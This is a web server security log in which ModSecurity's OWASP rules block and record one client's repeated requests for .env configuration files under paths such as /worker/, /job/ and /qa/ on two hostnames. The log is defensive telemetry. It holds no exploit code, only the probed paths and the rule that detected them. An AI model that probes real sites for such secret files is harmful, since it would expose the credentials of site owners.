[Mon May 11 16:27:25.239281 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:46114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/worker/.env"] [unique_id "agHnTfy_GXSWIKeli0vy0QAAAI8"]
[Mon May 11 16:27:25.239760 2026] [core:error] [pid 1411201:tid 1411261] [client 18.180.54.2:46114] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:25.239914 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:46114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/worker/.env"] [unique_id "agHnTfy_GXSWIKeli0vy0QAAAI8"]
[Mon May 11 16:27:25.342433 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:46118] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /queue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/queue/.env"] [unique_id "agHnTTJnyuKVXoStDha1fwAAAEc"]
[Mon May 11 16:27:25.342659 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:46118] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/queue/.env"] [unique_id "agHnTTJnyuKVXoStDha1fwAAAEc"]
[Mon May 11 16:27:25.343151 2026] [core:error] [pid 1412074:tid 1412083] [client 18.180.54.2:46118] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:25.343331 2026] [security2:error] [pid 1412074:tid 1412083] [client 18.180.54.2:46118] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/queue/.env"] [unique_id "agHnTTJnyuKVXoStDha1fwAAAEc"]
[Mon May 11 16:27:25.979362 2026] [security2:error] [pid 1416109:tid 1416146] [client 18.180.54.2:46128] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /job/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/job/.env"] [unique_id "agHnTVV4kyjgo4bQBUhVHAAAANA"]
[Mon May 11 16:27:25.979593 2026] [security2:error] [pid 1416109:tid 1416146] [client 18.180.54.2:46128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/job/.env"] [unique_id "agHnTVV4kyjgo4bQBUhVHAAAANA"]
[Mon May 11 16:27:25.980265 2026] [core:error] [pid 1416109:tid 1416146] [client 18.180.54.2:46128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:25.980427 2026] [security2:error] [pid 1416109:tid 1416146] [client 18.180.54.2:46128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/job/.env"] [unique_id "agHnTVV4kyjgo4bQBUhVHAAAANA"]
[Mon May 11 16:27:26.059342 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:46132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /worker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/worker/.env"] [unique_id "agHnTjJnyuKVXoStDha1gAAAAEk"]
[Mon May 11 16:27:26.059563 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:46132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/worker/.env"] [unique_id "agHnTjJnyuKVXoStDha1gAAAAEk"]
[Mon May 11 16:27:26.060043 2026] [core:error] [pid 1412074:tid 1412085] [client 18.180.54.2:46132] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:26.060212 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:46132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/worker/.env"] [unique_id "agHnTjJnyuKVXoStDha1gAAAAEk"]
[Mon May 11 16:27:26.722100 2026] [security2:error] [pid 1411099:tid 1411123] [client 18.180.54.2:46146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/test/.env"] [unique_id "agHnTg-Qm4vhlWBPlMi6mwAAABc"]
[Mon May 11 16:27:26.722347 2026] [security2:error] [pid 1411099:tid 1411123] [client 18.180.54.2:46146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/test/.env"] [unique_id "agHnTg-Qm4vhlWBPlMi6mwAAABc"]
[Mon May 11 16:27:26.722841 2026] [core:error] [pid 1411099:tid 1411123] [client 18.180.54.2:46146] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:26.722987 2026] [security2:error] [pid 1411099:tid 1411123] [client 18.180.54.2:46146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/test/.env"] [unique_id "agHnTg-Qm4vhlWBPlMi6mwAAABc"]
[Mon May 11 16:27:26.756022 2026] [security2:error] [pid 1416109:tid 1416147] [client 18.180.54.2:46152] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /job/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/job/.env"] [unique_id "agHnTlV4kyjgo4bQBUhVHQAAANE"]
[Mon May 11 16:27:26.756259 2026] [security2:error] [pid 1416109:tid 1416147] [client 18.180.54.2:46152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/job/.env"] [unique_id "agHnTlV4kyjgo4bQBUhVHQAAANE"]
[Mon May 11 16:27:26.756745 2026] [core:error] [pid 1416109:tid 1416147] [client 18.180.54.2:46152] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:26.757137 2026] [security2:error] [pid 1416109:tid 1416147] [client 18.180.54.2:46152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/job/.env"] [unique_id "agHnTlV4kyjgo4bQBUhVHQAAANE"]
[Mon May 11 16:27:27.460667 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:46160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/qa/.env"] [unique_id "agHnTzJnyuKVXoStDha1ggAAAFI"]
[Mon May 11 16:27:27.460900 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:46160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/qa/.env"] [unique_id "agHnTzJnyuKVXoStDha1ggAAAFI"]
[Mon May 11 16:27:27.461439 2026] [core:error] [pid 1412074:tid 1412094] [client 18.180.54.2:46160] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:27.461606 2026] [security2:error] [pid 1412074:tid 1412094] [client 18.180.54.2:46160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/qa/.env"] [unique_id "agHnTzJnyuKVXoStDha1ggAAAFI"]
[Mon May 11 16:27:27.475150 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:46162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/test/.env"] [unique_id "agHnT0WKUxpmnkK7zHx8kwAAAQk"]
[Mon May 11 16:27:27.475354 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:46162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/test/.env"] [unique_id "agHnT0WKUxpmnkK7zHx8kwAAAQk"]
[Mon May 11 16:27:27.476022 2026] [core:error] [pid 1411055:tid 1411066] [client 18.180.54.2:46162] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:27.476271 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:46162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/test/.env"] [unique_id "agHnT0WKUxpmnkK7zHx8kwAAAQk"]
[Mon May 11 16:27:28.160855 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:46170] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /preview/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/preview/.env"] [unique_id "agHnUA-Qm4vhlWBPlMi6nQAAABg"]
[Mon May 11 16:27:28.161094 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:46170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/preview/.env"] [unique_id "agHnUA-Qm4vhlWBPlMi6nQAAABg"]
[Mon May 11 16:27:28.161626 2026] [core:error] [pid 1411099:tid 1411124] [client 18.180.54.2:46170] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:28.161791 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:46170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/preview/.env"] [unique_id "agHnUA-Qm4vhlWBPlMi6nQAAABg"]
[Mon May 11 16:27:28.170232 2026] [security2:error] [pid 1411201:tid 1411257] [client 18.180.54.2:46176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/qa/.env"] [unique_id "agHnUPy_GXSWIKeli0vy1gAAAIs"]
[Mon May 11 16:27:28.170433 2026] [security2:error] [pid 1411201:tid 1411257] [client 18.180.54.2:46176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/qa/.env"] [unique_id "agHnUPy_GXSWIKeli0vy1gAAAIs"]
[Mon May 11 16:27:28.170944 2026] [core:error] [pid 1411201:tid 1411257] [client 18.180.54.2:46176] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:28.171103 2026] [security2:error] [pid 1411201:tid 1411257] [client 18.180.54.2:46176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/qa/.env"] [unique_id "agHnUPy_GXSWIKeli0vy1gAAAIs"]
[Mon May 11 16:27:28.840432 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.180.54.2:37402] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/beta/.env"] [unique_id "agHnUA-Qm4vhlWBPlMi6ngAAAAo"]
[Mon May 11 16:27:28.840661 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.180.54.2:37402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/beta/.env"] [unique_id "agHnUA-Qm4vhlWBPlMi6ngAAAAo"]
[Mon May 11 16:27:28.841125 2026] [core:error] [pid 1411099:tid 1411110] [client 18.180.54.2:37402] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:28.841285 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.180.54.2:37402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/beta/.env"] [unique_id "agHnUA-Qm4vhlWBPlMi6ngAAAAo"]
[Mon May 11 16:27:28.889685 2026] [security2:error] [pid 1411201:tid 1411255] [client 18.180.54.2:37416] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /preview/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/preview/.env"] [unique_id "agHnUPy_GXSWIKeli0vy1wAAAIk"]
[Mon May 11 16:27:28.889842 2026] [security2:error] [pid 1411201:tid 1411255] [client 18.180.54.2:37416] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/preview/.env"] [unique_id "agHnUPy_GXSWIKeli0vy1wAAAIk"]
[Mon May 11 16:27:28.890311 2026] [core:error] [pid 1411201:tid 1411255] [client 18.180.54.2:37416] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:28.890458 2026] [security2:error] [pid 1411201:tid 1411255] [client 18.180.54.2:37416] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/preview/.env"] [unique_id "agHnUPy_GXSWIKeli0vy1wAAAIk"]
